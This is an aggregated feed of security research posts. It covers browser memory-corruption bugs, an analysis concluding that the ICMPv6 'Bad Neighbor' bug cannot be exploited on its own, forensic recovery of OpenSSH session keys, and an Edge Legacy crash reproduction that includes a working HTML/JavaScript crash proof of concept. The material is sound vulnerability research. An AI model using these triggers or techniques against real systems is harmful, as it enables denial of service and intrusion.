Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

MSIE 11 garbage collector attribute type confusion

5 April 2023 at 19:10

(MS16-063, CVE-2016-0199)

With MS16-063 Microsoft has patched CVE-2016-0199: a memory corruption bug in the garbage collector of the JavaScript engine used in Internet Explorer 11. By exploiting this vulnerability, a website can causes this garbage collector to handle some data in memory as if it was an object, when in fact it contains data for another type of value, such as a string or number. The garbage collector code will use this data as a virtual function table (vftable) in order to make a virtual function call. An attacker has enough control over this data to allow execution of arbitrary code.

MS Edge Tree::ANode::IsInTree use-after-free (MemGC) & Abandonment

5 April 2023 at 19:10

A specially crafted Javascript inside an HTML page can trigger a use-after-free bug in Tree::ANode::IsInTree or a breakpoint in Abandonment::InduceAbandonment in Microsoft Edge. The use-after-free bug is mitigated by MemGC: if MemGC is enabled (which it is by default) the memory is never freed. This effectively prevents exploitation of the issue. The Abandonment appears to be triggered by a stack exhaustion bug; the Javascript creates a loop where an event handler triggers a new event, which in turn triggers the event handler, etc.. This consumes a stack space until there is no more stack available. Edge does appear to be able to handle such a situation gracefully under certain conditions, but not all. It is easy to avoid those conditions to force triggering the Abandonment.

The interesting thing is that this indicates that the assumption that "hitting Abandonment means a bug is not a security issue" may not be correct in all cases.

MS Edge CDOMTextNode::get_data type confusion

5 April 2023 at 19:10

(MS16-002, CVE-2016-0003)

Specially crafted Javascript inside an HTML page can trigger a type confusion bug in Microsoft Edge that allows accessing a C++ object as if it was a BSTR string. This can result in information disclosure, such as allowing an attacker to determine the value of pointers to other objects and/or functions. This information can be used to bypass ASLR mitigations. It may also be possible to modify arbitrary memory and achieve remote code execution, but this was not investigated.

MSIE 9-11 MSHTML PROPERTYDESC::HandleStyleComponentProperty out-of-bounds read

5 April 2023 at 19:10

(MS16-104, CVE-2016-3324)

A specially crafted web-page can cause Microsoft Internet Explorer 9-11 to assume a CSS value stored as a string can only be "true" or "false". To determine which of these two values it is, the code checks if the fifth character is an 'e' or a '\0'. An attacker that is able to set it to a smaller string can cause the code to read data out-of-bounds and is able to determine if a WCHAR value stored behind that string is '\0' or not.

MS Edge CTreePosGap::PartitionPointers use-after-free (MemGC)

5 April 2023 at 19:10

A specially crafted Javascript inside an HTML page can trigger a use-after-free bug in the CTreePosGap::PartitionPointers function of edgehtml.dll in Microsoft Edge. This use-after-free bug is mitigated by MemGC by default: with MemGC enabled the memory is never actually freed. This mitigation is considered sufficient to make this a non-security issue as explained by Microsoft SWIAT in their blog post Triaging the exploitability of IE/Edge crashes.

Since this is not considered a security issue, I have the opportunity to share details about the issue with you before the issue has been fixed. And since Microsoft are unlikely to provide a fix for this issue on short notice, you should be able to reproduce this issue for some time after publication of this post. I will try to explain how I analyzed this issue using BugId and EdgeDbg, so that you can reproduce what I did and see for yourself.

VBScript RegExpComp::PnodeParse out-of-bounds read

5 April 2023 at 19:10

(The fix and CVE number for this bug are not known)

A specially crafted script can cause the VBScript engine to read data beyond a memory block for use as a regular expression. An attacker that is able to run such a script in any application that embeds the VBScript engine may be able to disclose information stored after this memory block. This includes all versions of Microsoft Internet Explorer.

Magic values in 32-bit processes and 64-bit OS-es

12 November 2020 at 12:00

Software components such as memory managers often use magic values to mark memory as having a certain state. These magic values have often (but not always) been chosen to coincide with addresses that fall outside of the user-land address space on 32-bit versions of the Operating System. This ensures that if a vulnerability in the software allows an attacker to get the code to use such a value as a pointer, this results in an access violation. However, on 64-bit architectures the entire 32-bit address space can be used for user-land allocations, allowing an attacker to allocate memory at all the addresses commonly used as magic values and exploit such a vulnerability.

Heap spraying high addresses in 32-bit Chrome/Firefox on 64-bit Windows

12 November 2020 at 12:00

In my previous blog post I wrote about "magic values" that were originally chosen to help mitigate exploitation of memory corruption flaws and how this mitigation could potentially be bypassed on 64-bit Operating Systems, specifically Windows. In this blog post, I will explain how to create a heap spray (of sorts) that can be used to allocate memory in the relevant address space range and fill it with arbitrary data for use in exploiting such a vulnerability.

MSIE 11 MSHTML CView::CalculateImageImmunity use-after-free

5 April 2023 at 19:10

(The fix and CVE number for this bug are not known)

A specially crafted web-page can cause Microsoft Internet Explorer 11 to free a memory block that contains information about an image. The code continues to use the data in freed memory block immediately after freeing it. It does not appear that there is enough time between the free and reuse to exploit this issue.

MSIE 9 MSHTML CPtsTextParaclient::CountApes out-of-bounds read

5 April 2023 at 19:10

(The fix and CVE number for this bug are not known)

A specially crafted web-page can cause Microsoft Internet Explorer 9 to access data before the start of a memory block. An attack that is able to control what is stored before this memory block may be able to disclose information from memory or execute arbitrary code.

MSIE 10&11 BuildAnimation NULL pointer dereference

12 November 2020 at 12:00

A specially crafted style sheet inside an HTML page can trigger a NULL pointer dereference in Microsoft Internet Explorer 10 and 11. The pointer in question is assumed to point to a function, and the code attempts to use it to execute this function, which normally leads to an access violation when attempting to execute unmapped memory at address 0. In some cases, Control Flow Guard (CFG) will attempt to check if the address is a valid indirect call target. Because of the way CFG is implemented, this can lead to a read access violation in unmapped memory at a seemingly arbitrary address.

VBScript CRegExp::Execute use of uninitialized memory

5 April 2023 at 19:10

(MS14-080 and MS14-084, CVE-2014-6363)

A specially crafted script can cause the VBScript engine to access data before initializing it. An attacker that is able to run such a script in any application that embeds the VBScript engine may be able to control execution flow and execute arbitrary code. This includes all versions of Microsoft Internet Explorer.

Exploring the Exploitability of “Bad Neighbor”: The Recent ICMPv6 Vulnerability (CVE-2020-16898)

11 November 2020 at 19:59
Exploring the Exploitability of “Bad Neighbor”: The Recent ICMPv6 Vulnerability (CVE-2020-16898)

At the Patch Tuesday on October 13, Microsoft published a patch and an advisory for CVE-2020-16898, dubbed “Bad Neighbor”, which was undoubtedly the highlight of the monthly series of patches. The bug has received a lot of attention since it was published as an RCE vulnerability, meaning that with a successful exploitation it could be made wormable. Initially, it was graded with a high CVSS score of 9.8/10, though it was later lowered to 8.8.

In days following the publication, several write-ups and POCs were published. We looked at some of them:

The writeup by pi3 contains details that are not mentioned in the writeup by Quarkslab. It’s important to note that the bug can only be exploited when the source address is a link-local address. That’s a significant limitation, meaning that the bug cannot be exploited over the internet. In any case, both writeups explain the bug in general and then dive into triggering a buffer overflow, causing a system crash, without exploring other options.

We wanted to find out whether something else could be done with this vulnerability, aside from triggering the buffer overflow and causing a blue screen (BSOD)

In this writeup, we’ll share our findings.

The bug in a nutshell

The bug happens in the tcpip!Ipv6pHandleRouterAdvertisement function, which is responsible for handling incoming ICMPv6 packets of the type Router Advertisement (part of the Neighbor Discovery Protocol).

The packet structure is (RFC 4861):

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Code      |          Checksum             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Cur Hop Limit |M|O|  Reserved |       Router Lifetime         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                         Reachable Time                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                          Retrans Timer                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|   Options ...
+-+-+-+-+-+-+-+-+-+-+-+-

As can be seen from the packet structure, the packet consists of a 16-bytes header, followed by a variable amount of option structures. Each option structure begins with a type field and a length field, followed by specific fields for the relevant option type.

The bug happens due to an incorrect handling of the Recursive DNS Server Option (type 25, RFC 5006):

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Length    |           Reserved            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                           Lifetime                            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
:            Addresses of IPv6 Recursive DNS Servers            :
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Length field defines the length of the option in units of 8 bytes. The option header size is 8 bytes, and each IPv6 address adds additional 16 bytes to the length. That means that if the structure contains n IPv6 addresses, the length is supposed to be set to 1+2*n. The bug happens when the length is an even number, causing the code to incorrectly interpret the beginning of the next option structure.

Visualizing the POC of 0xeb-bp

As a starting point, let’s visualize 0xeb-bp’s POC and get some intuition about what’s going on and why it causes a stack overflow. Here is the ICMPv6 packet as constructed in the source code:

As you can see, the ICMPv6 packet is followed by two Recursive DNS Server options (type 25), and then a 256-bytes buffer. The two options have an even length of 4, which triggers the bug.

The tcpip!Ipv6pHandleRouterAdvertisement function that parses the packet does two iterations over the option structures. The first iteration does simple checks such as verifying the length field of the structures. The second iteration actually parses the option structures. Because of the bug, each iteration interprets the packet differently.

Here’s how the first iteration sees the packet:

Each option structure is just skipped according to the length field after doing some basic checks.

Here’s how the second iteration sees it:

This time, in the case of a Recursive DNS Server option, the length field is used to determine the amount of IPv6 addresses, which is calculated as following:

amount_of_addr = (length – 1) / 2

Then, the IPv6 addresses are processed, and the next iteration continues after the last processed IPv6 address, which, in case of an even length value, happens to be in the middle of the option structure compared to what the first iteration sees. This results in processing an option structure which wasn’t validated in the first iteration. 

Specifically in this POC, 34 is not a valid length for option of the type 24, but because it wasn’t validated, the processing continues and too many bytes are copied on the stack, causing a stack overflow. Noteworthy, fragmentation is required for triggering the stack overflow (see the Quarkslab writeup for details).

Zooming out

Now we know how to trigger a stack overflow using CVE-2020-16898, but what are the checks that are made in each of the mentioned iterations? What other checks, aside from the length check, can we bypass using this bug? Which option types are supported, and is the handling different for each of them? 

We didn’t find answers to these questions in any writeup, so we checked it ourselves.

Here are the relevant parts of the Ipv6pHandleRouterAdvertisement function, slightly simplified:

void Ipv6pHandleRouterAdvertisement(...)
{
    // Initialization and other code...

    if (!IsLinkLocalAddress(SrcAddress) && !IsLoopbackAddress(SrcAddress))
        // error

    // Initialization and other code...

    NET_BUFFER NetBuffer = /* ... */;

    // First loop
    while (NetBuffer->DataLength >= 2)
    {
        BYTE TempTypeLen[2];
        BYTE* TempTypeLenPtr = NdisGetDataBuffer(NetBuffer, 2, TempTypeLen, 1, 0);
        WORD OptionLenInBytes = TempTypeLenPtr[1] * 8;
        if (OptionLenInBytes == 0 || OptionLenInBytes > NetBuffer->DataLength)
            // error

        BYTE OptionType = TempTypeLenPtr[0];
        switch (OptionType)
        {
        case 1: // Source Link-layer Address
            // ...
            break;

        case 3: // Prefix Information
            if (OptionLenInBytes != 0x20)
                // error

            BYTE TempPrefixInfo[0x20];
            BYTE* TempPrefixInfoPtr = NdisGetDataBuffer(NetBuffer, 0x20, TempPrefixInfo, 1, 0);
            BYTE PrefixInfoPrefixLength = TempRouteInfoPtr[2];
            if (PrefixInfoPrefixLength > 128)
                // error
            break;

        case 5: // MTU
            // ...
            break;

        case 24: // Route Information Option
            if (OptionLenInBytes > 0x18)
                // error

            BYTE TempRouteInfo[0x18];
            BYTE* TempRouteInfoPtr = NdisGetDataBuffer(NetBuffer, 0x18, TempRouteInfo, 1, 0);
            BYTE RouteInfoPrefixLength = TempRouteInfoPtr[2];
            if (RouteInfoPrefixLength > 128 ||
                (RouteInfoPrefixLength > 64 && OptionLenInBytes < 0x18) ||
                (RouteInfoPrefixLength > 0 && OptionLenInBytes < 0x10))
                // error
            break;

        case 25: // Recursive DNS Server Option
            if (OptionLenInBytes < 0x18)
                // error

            // Added after the patch - this it the fix
            //if (OptionLenInBytes - 8 % 16 != 0)
            //    // error
            break;

        case 31: // DNS Search List Option
            if (OptionLenInBytes < 0x10)
                // error
            break;
        }

        NetBuffer->DataOffset += OptionLenInBytes;
        NetBuffer->DataLength -= OptionLenInBytes;
        // Other adjustments for NetBuffer...
    }

    // Rewind NetBuffer and do other stuff...

    // Second loop...
    while (NetBuffer->DataLength >= 2)
    {
        BYTE TempTypeLen[2];
        BYTE* TempTypeLenPtr = NdisGetDataBuffer(NetBuffer, 2, TempTypeLen, 1, 0);
        WORD OptionLenInBytes = TempTypeLenPtr[1] * 8;
        if (OptionLenInBytes == 0 || OptionLenInBytes > NetBuffer->DataLength)
            // error

        BOOL AdvanceBuffer = TRUE;

        BYTE OptionType = TempTypeLenPtr[0];
        switch (OptionType)
        {
        case 3: // Prefix Information
            BYTE TempPrefixInfo[0x20];
            BYTE* TempPrefixInfoPtr = NdisGetDataBuffer(NetBuffer, 0x20, TempPrefixInfo, 1, 0);
            BYTE PrefixInfoPrefixLength = TempRouteInfoPtr[2];
            // Lots of code. Assumptions:
            // PrefixInfoPrefixLength <= 128
            break;

        case 24: // Route Information Option
            BYTE TempRouteInfo[0x18];
            BYTE* TempRouteInfoPtr = NdisGetDataBuffer(NetBuffer, 0x18, TempRouteInfo, 1, 0);
            BYTE RouteInfoPrefixLength = TempRouteInfoPtr[2];
            // Some code. Assumptions:
            // PrefixInfoPrefixLength <= 128
            // Other, less interesting assumptions about PrefixInfoPrefixLength
            break;

        case 25: // Recursive DNS Server Option
            Ipv6pUpdateRDNSS(..., NetBuffer, ...);
            AdvanceBuffer = FALSE;
            break;

        case 31: // DNS Search List Option
            Ipv6pUpdateDNSSL(..., NetBuffer, ...);
            AdvanceBuffer = FALSE;
            break;
        }

        if (AdvanceBuffer)
        {
            NetBuffer->DataOffset += OptionLenInBytes;
            NetBuffer->DataLength -= OptionLenInBytes;
            // Other adjustments for NetBuffer...
        }
    }

    // More code...
}

As can be seen from the code, only 6 option types are supported in the first loop, the others are ignored. In any case, each header is skipped precisely according to the Length field.

Even less options, 4, are supported in the second loop. And similarly to the first loop, each header is skipped precisely according to the Length field, but this time with two exceptions: types 24 (the Route Information Option) and 25 (Recursive DNS Server Option) have functions which adjust the network buffer pointers by themselves, creating an opportunity for inconsistencies. 

That’s exactly what is happening with this bug – the Ipv6pUpdateRDNSS function doesn’t adjust the network buffer pointers as expected when the length field is even.

Breaking assumptions

Essentially, this bug allows us to break the assumptions made by the second loop that are supposed to be verified in the first loop. The only option types that are relevant are the 4 types which appear in both loops, that’s also why we didn’t include the other 2 in the code of the first loop. One such assumption is the value of the length field, and that’s how the buffer overflow POC works, but let’s revisit them all and see what can be achieved.

  • Option type 3 – Prefix Information
    • The option structure size must be 0x20 bytes. Breaking this assumption is what allows us to trigger the stack overflow, by providing a larger option structure. We can also provide a smaller structure, but that doesn’t have much value in this case.
    • The Prefix Length field value must be at most 128. Breaking this assumption allows us to set the field to an invalid value in the range of 129-255. This can indeed be used to cause an out-of-bounds data write, but in all such cases that we could find, the out-of-bounds write happens on the stack in a location which is overridden later anyway, so causing such out-of-bounds writes has no practical value.

      For example, one such out-of-bounds write happens in tcpip!Ipv6pMakeRouteKey, called by tcpip!IppValidateSetAllRouteParameters.
  • Option type 24 – Route Information Option
    • The option structure size must not be larger than 0x18 bytes. Same implications as for option type 3.
    • The Prefix Length field value must be at most 128. Same implications as for option type 3.
    • The Prefix Length field value must fit the structure option size. That isn’t really interesting since any value in the range 0-128 is handled correctly. The worst thing that could happen here is a small out-of-bounds read.
  • Option type 25 – Recursive DNS Server Option
    • The option structure size must not be smaller than 0x18 bytes. This isn’t interesting, since the size must be at least 8 bytes anyway (the length field is verified to be larger than zero in both loops), and any such structure is handled correctly, even though a size of 8-bytes is not valid according to the specification.
    • The option structure size must be in the form of 8+n*16 bytes. This check was added after fixing CVE-2020-16898.
  • Option type 31 – DNS Search List Option
    • The option structure size must not be smaller than 0x10 bytes. Same implications as for option type 25.

As you can see, there was a slight chance of doing something other than the demonstrated stack overflow by breaking the assumption of the valid prefix length value for option type 3 or 24. Even though it’s literally about smuggling a single bit, sometimes that’s enough. But it looks like this time we weren’t that lucky.

Revisiting the Stack Overflow

Before giving up, we took a closer look at the stack. The POCs that we’ve seen are overriding the stack such that the stack cookie (the __security_cookie value) is overridden, causing a system crash before the function returns.

We checked whether overriding anything on the stack can help achieve code execution before the function returns. That can be a local variable in the “Local variables (2)” space, or any variable in the previous frames that might be referenced inside the function. Unfortunately, we came to the conclusion that all the variables in the “Local variables (2)” space are output buffers that are modified before access, and no data from the previous frames is accessed.

Summary

We conclude with high confidence that CVE-2020-16898 is not exploitable without an additional vulnerability. It is possible that we may have missed something. Any insights / feedback is welcome. Even though we weren’t able to exploit the bug, we enjoyed the research, and we hope that you enjoyed this writeup as well.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team

Your subscription request to ZecOps Blog has been successfully sent.
We won’t spam, pinky swear 🤞

Decrypting OpenSSH sessions for fun and profit

11 November 2020 at 10:24

Author: Jelle Vergeer

Introduction

A while ago we had a forensics case in which a Linux server was compromised and a modified OpenSSH binary was loaded into the memory of a webserver. The modified OpenSSH binary was used as a backdoor to the system for the attackers. The customer had pcaps and a hypervisor snapshot of the system on the moment it was compromised. We started wondering if it was possible to decrypt the SSH session and gain knowledge of it by recovering key material from the memory snapshot. In this blogpost I will cover the research I have done into OpenSSH and release some tools to dump OpenSSH session keys from memory and decrypt and parse sessions in combinarion with pcaps. I have also submitted my research to the 2020 Volatility framework plugin contest.

SSH Protocol

Firstly, I started reading up on OpenSSH and its workings. Luckily, OpenSSH is opensource so we can easily download and read the implementation details. The RFC’s, although a bit boring to read, were also a wealth of information. From a high level overview, the SSH protocol looks like the following:

  1. SSH protocol + software version exchange
  2. Algorithm negotiation (KEX INIT)
    • Key exchange algorithms
    • Encryption algorithms
    • MAC algorithms
    • Compression algorithms
  3. Key Exchange
  4. User authentication
  5. Client requests a channel of type “session”
  6. Client requests a pseudo terminal
  7. Client interacts with session

Starting at the begin, the client connects to the server and sends the protocol version and software version:
SSH-2.0-OpenSSH_8.3. The server responds with its protocol and software version. After this initial protocol and software version exchange, all traffic is wrapped in SSH frames. SSH frames exist primarily out of a length, padding length, payload data, padding content, and MAC of the frame. An example SSH frame:

Example SSH Frame parsed with dissect.cstruct

Before an encryption algorithm is negotiated and a session key is generated the SSH frames will be unencrypted, and even when the frame is encrypted, depending on the algorithm, parts of the frame may not be encrypted. For example aes256-gcm will not encrypt the 4 bytes length in the frame, but chacha20-poly1305 will.

Next up the client will send a KEX_INIT message to the server to start negotiating parameters for the session like key exchange and encryption algorithm. Depending on the order of those algorithms the client and server will pick the first preferred algorithm that is supported by both sides. Following the KEX_INIT message, several key exchange related messages are exchanged after which a NEWKEYS messages is sent from both sides. This message tells the other side everything is setup to start encrypting the session and the next frame in the stream will be encrypted. After both sides have taken the new encryption keys in effect, the client will request user authentication and depending on the configured authentication mechanisms on the server do password/ key/ etc based authentication. After the session is authenticated the client will open a channel, and request services over that channel based on the requested operation (ssh/ sftp/ scp etc).

Recovering the session keys

The first step in recovering the session keys was to analyze the OpenSSH source code and debug existing OpenSSH binaries. I tried compiling OpenSSH myself, logging the generated session keys somewhere and attaching a debugger and searching for those in the memory of the program. Success! Session keys were kept in memory on the heap. Some more digging into the source code pointed me to the functions responsible for sending and recieving the NEWKEYS frame. I discovered there is a “ssh” structure which stores a “session_state” structure. This structure in turn holds all kinds of information related to the current SSH session inluding a newkeys structure containing information relating the encryption, mac and compression algorithm. One level deeper we finally find the “sshenc” structure holding the name of the cipher, the key, IV and the block length. Everything we need! A nice overview of the structure in OpenSSH is shown below:

SSHENC Structure and relations

And the definition of the sshenc structure:

SSHENC Structure

It’s difficult to find the key itself in memory (it’s just a string of random bytes), but the sshenc (and other) structures are more distinct, having some properties we can validate against. We can then scrape the entire memory address space of the program and validate each offset against these constraints. We can check for the following properties:

  • name, cipher, key and iv members are valid pointers
  • The name member points to a valid cipher name, which is equal to cipher->name
  • key_len is within a valid range
  • iv_len is within a valid range
  • block_size is within a valid range

If we validate against all these constraints we should be able to reliably find the sshenc structure. I started of building a POC Python script which I could run on a live host which attaches to processes and scrapes the memory for this structure. The source code for this script can be found here. It actually works rather well and outputs a json blob for each key found. So I demonstrated that I can recover the session keys from a live host with Python and ptrace, but how are we going to recover them from a memory snapshot? This is where Volatility comes into play. Volatility is a memory forensics framework written in Python with the ability to write custom plugins. And with some efforts, I was able to write a Volatility 2 plugin and was able to analyze the memory snapshot and dump the session keys! For the Volatility 3 plugin contest I also ported the plugin to Volatility 3 and submitted the plugin and research to the contest. Fingers crossed!

Volatility 2 SSH Session Key Dumper output

Decrypting and parsing the traffic

The recovery of the session keys which are used to encrypt and decrypt the traffic was succesfull. Next up is decrypting the traffic! I started parsing some pcaps with pynids, a TCP parsing and reassembly library. I used our in-house developed dissect.cstruct library to parse data structures and developed a parsing framework to parse protocols like ssh. The parsing framework basically feeds the packets to the protocol parser in the correct order, so if the client sends 2 packets and the server replies with 3 packets the packets will also be supplied in that same order to the parser. This is important to keep overall protocol state. The parser basically consumes SSH frames until a NEWKEYS frame is encountered, indicating the next frame is encrypted. Now the parser peeks the next frame in the stream from that source and iterates over the supplied session keys, trying to decrypt the frame. If successful, the parser installs the session key in the state to decrypt the remaining frames in the session. The parser can handle pretty much all encryption algorithms supported by OpenSSH. The following animation tries to depict this process:

SSH Protocol Parsing

And finally the parser in action, where you can see it decrypts and parses a SSH session, also exposing the password used by the user to authenticate:

Example decrypted and parsed SSH session

Conclusion

So to sum up, I researched the SSH protocol, how session keys are stored and kept in memory for OpenSSH, found a way to scrape them from memory and use them in a network parser to decrypt and parse SSH sessions to readable output. The scripts used in this research can be found here:

A potential next step or nice to have would be implementing this decrypter and parser into Wireshark.

Final thoughts

Funny enough, during my research I also came across these commented lines in the ssh_set_newkeys function in the OpenSSH source. How ironic! If these lines were uncommented and compiled in the OpenSSH binaries this research would have been much harder..

OpenSSH source code snippet

References

Re-discovering a JWT Authentication Bypass in ServiceStack

2 November 2020 at 08:37
TL;DR ServiceStack before version 5.9.2 failed to properly verify JWT signatures, allowing to forge arbitrary tokens and bypass authentication/authorization mechanisms. The vulnerability was discovered and patched by the ServiceStack team without highlighting the actual impact, so we chose to publish this blog post along with an advisory. Routine checks –> Auth bypass During a Web Application Penetration Test for one of our customers, I noticed that after the login process through a 3rd-party Oauth service the web application used JWT tokens to track sessions and privileges.

Crash Reproduction Series: Microsoft Edge Legacy

2 November 2020 at 07:30
Crash Reproduction Series: Microsoft Edge Legacy

During yet another Digital Forensics investigation using ZecOps Crash Forensics Platform, we saw a crash of the Legacy (pre-Chromium) Edge browser. The crash was caused by a NULL pointer dereference bug, and we concluded that the root cause was a benign bug of the browser. Nevertheless, we thought that it would be a nice showcase of a crash reproduction.

Here’s the stack trace of the crash:

00007ffa`35f4a172     edgehtml!CMediaElement::IsSafeToUse+0x8
00007ffa`36c78124     edgehtml!TrackHelpers::GetStreamIndex+0x26
00007ffa`36c7121f     edgehtml!CSourceBuffer::RemoveAllTracksHelper<CTextTrack,CTextTrackList>+0x98
00007ffa`36880903     edgehtml!CMediaSourceExtension::Var_removeSourceBuffer+0xc3
00007ffa`364e5f95     edgehtml!CFastDOM::CMediaSource::Trampoline_removeSourceBuffer+0x43
00007ffa`3582ea87     edgehtml!CFastDOM::CMediaSource::Profiler_removeSourceBuffer+0x25
00007ffa`359d07b6     Chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x207
00007ffa`35834ab8     Chakra!amd64_CallFunction+0x86
00007ffa`35834d38     Chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > > >+0x198
00007ffa`35834f99     Chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > >+0xb8
00007ffa`3582cd80     Chakra!Js::InterpreterStackFrame::ProcessProfiled+0x149
00007ffa`3582df9f     Chakra!Js::InterpreterStackFrame::Process+0xe0
00007ffa`3582cf9e     Chakra!Js::InterpreterStackFrame::InterpreterHelper+0x88f
0000016a`bacc1f8a     Chakra!Js::InterpreterStackFrame::InterpreterThunk+0x4e
00007ffa`359d07b6     0x0000016a`bacc1f8a
00007ffa`358141ea     Chakra!amd64_CallFunction+0x86
00007ffa`35813f0c     Chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x2aa
00007ffa`35813e4a     Chakra!Js::JavascriptFunction::CallRootFunction+0x7c
00007ffa`35813d29     Chakra!ScriptSite::CallRootFunction+0x6a
00007ffa`35813acb     Chakra!ScriptSite::Execute+0x179
00007ffa`362bebed     Chakra!ScriptEngineBase::Execute+0x19b
00007ffa`362bde49     edgehtml!CListenerDispatch::InvokeVar+0x41d
00007ffa`362bc6c2     edgehtml!CEventMgr::_InvokeListeners+0xd79
00007ffa`35fdf8f1     edgehtml!CEventMgr::Dispatch+0x922
00007ffa`35fe0089     edgehtml!CEventMgr::DispatchPointerEvent+0x215
00007ffa`35fe04f4     edgehtml!CEventMgr::DispatchClickEvent+0x1d1
00007ffa`36080f10     edgehtml!Tree::ElementNode::Fire_onclick+0x60
00007ffa`36080ca0     edgehtml!Tree::ElementNode::DoClick+0xf0
[...]

Amusingly, the browser crashed in the CMediaElement::IsSafeToUse function. Apparently, the answer is no – it isn’t safe to use.

Crash reproduction

The stack trace indicates that the function that was executed by the JavaScript code, and eventually caused the crash, was removeSourceBuffer, part of the MediaSource Web API. Looking for a convenient example to play with, we stumbled upon this page which uses the counterpart function, addSourceBuffer. We added a button that calls removeSourceBuffer and tried it out.

Just calling removeSourceBuffer didn’t cause a crash (otherwise it would be too easy, right?). To see how far we got, we attached a debugger and put a breakpoint on the edgehtml!CMediaSourceExtension::Var_removeSourceBuffer function, then did some stepping. We saw that the CSourceBuffer::RemoveAllTracksHelper function is not being called at all. What tracks does it help to remove?

After some searching, we learned that there’s the HTML <track> element that allows us to specify textual data, such as subtitles, for a media element. We added such an element to our sample video and bingo! Edge crashed just as we hoped.

Crash reason

Our best guess is that the crash happens because the CTextTrackList::GetTrackCount function returns an incorrect value. In our case, it returns 2 instead of 1. An iteration is then made, and the CTextTrackList::GetTrackNoRef function is called with index values from 0 to the track count (simplified):

int count = CTextTrackList::GetTrackCount();
for (int i = 0; i < count; i++) {
    CTextTrackList::GetTrackNoRef(..., i);
    /* more code... */
}

While it may look like an out-of-bounds bug, it isn’t. GetTrackNoRef returns an error for an invalid index, and for index=1 (in our case), a valid object is returned, it’s just that one of its fields is a NULL pointer. Perhaps the last value in the array is some kind of a sentinel value which was not supposed to be part of the iteration.

Exploitation

The bug is not exploitable, and can only cause a slight inconvenience by crashing the browser tab.

POC

Here’s a POC that demonstrates the crash. Save it as an html file, and place the test.mp4, foo.vtt files in the same folder.

Tested version:

  • Microsoft Edge 44.18362.449.0
  • Microsoft EdgeHTML 18.18363
<button>Crash</button>
<br><br><br>

<video autoplay controls playsinline>
    <!-- https://gist.github.com/Michael-ZecOps/046e2c97d208a0a6da2f81c3812f7d5d -->
    <track label="English" kind="subtitles" srclang="en" src="foo.vtt" default>
</video>

<script>
    // Based on: https://simpl.info/mse/
    var FILE = 'test.mp4'; // https://w3c-test.org/media-source/mp4/test.mp4
    var video = document.querySelector('video');

    var mediaSource = new MediaSource();
    video.src = window.URL.createObjectURL(mediaSource);

    mediaSource.addEventListener('sourceopen', function () {
        var sourceBuffer = mediaSource.addSourceBuffer('video/mp4; codecs="mp4a.40.2,avc1.4d400d"');

        var button = document.querySelector('button');
        button.onclick = () => mediaSource.removeSourceBuffer(mediaSource.sourceBuffers[0]);

        get(FILE, function (uInt8Array) {
            var file = new Blob([uInt8Array], {
                type: 'video/mp4'
            });

            var reader = new FileReader();

            reader.onload = function (e) {
                sourceBuffer.appendBuffer(new Uint8Array(e.target.result));
                sourceBuffer.addEventListener('updateend', function () {
                    if (!sourceBuffer.updating && mediaSource.readyState === 'open') {
                        mediaSource.endOfStream();
                    }
                });
            };

            reader.readAsArrayBuffer(file);
        });
    }, false);

    function get(url, callback) {
        var xhr = new XMLHttpRequest();
        xhr.open('GET', url, true);
        xhr.responseType = 'arraybuffer';
        xhr.send();

        xhr.onload = function () {
            if (xhr.status !== 200) {
                alert('Unexpected status code ' + xhr.status + ' for ' + url);
                return false;
            }
            callback(new Uint8Array(xhr.response));
        };
    }
</script>

Does mobile DFIR research interest you?

ZecOps is expanding. We’re looking for additional researchers to join ZecOps Research Team. If you’re interested, send us a note at [email protected].

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team

Your subscription request to ZecOps Blog has been successfully sent.
We won’t spam, pinky swear 🤞

Some thoughts on ToB’s GPU-based fuzzing

23 October 2020 at 07:11

The blog

The blog we’re looking at today is an incredible blog by Ryan Eberhardt on the Trail of Bits blog! You should read it first, it’s really neat, there’s also some awesome graphics in it which makes it a super fun read!

Let’s build a high-performance fuzzer with GPUs!

Summary

In the ToB blog, they talk about using GPUs to fuzz. More specifically, they talk about lifting a target architecture into LLVM IR, and then emitting the LLVM IR to a binary which can run on a GPU. In this case, they’re targeting PTX assembly to run on the NVIDIA Tesla T4 GPU. This is done using a tool ToB has been working on for quite a while, called remill, which is designed for binary translation. Remill alone is incredibly impressive.

The target they picked as a benchmark is the BFP packet filtering code in libpcap, pcap_filter_with_aux_data. This function is pretty simple, and it executes a compiled BPF filter and uses it to extract information and filter a packet.

